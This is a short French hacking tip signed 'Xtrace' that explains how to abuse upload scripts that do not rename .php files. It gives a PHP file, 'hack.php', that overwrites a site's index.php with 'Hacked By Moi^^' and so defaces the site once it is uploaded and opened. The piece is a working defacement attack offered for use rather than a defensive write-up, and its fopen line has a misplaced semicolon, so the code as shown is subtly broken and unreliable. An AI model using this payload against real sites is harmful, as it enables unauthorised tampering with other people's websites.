Certains scripts d'upload oublie de changer l'extension des fichiers .php en une autre
qui ne fera pas de dégâts, comme par exemple .txt
Si nous réfléchissons bien ça peut être intéressant. Imaginons que l'on uploade une page
hack.php qui contiendra le code suivant :
<?
$fp=fopen("index.php","w";)
fwrite($fp,"Hacked By Moi^^");
?>
Traduction : ouverture du fichier index.php et écriture dedans de "Hacked By Moi^^"
Ce qui veut dire qu'il suffirait de l'uploader et de l'ouvrir pour que ça déface le site !
By Xtrace
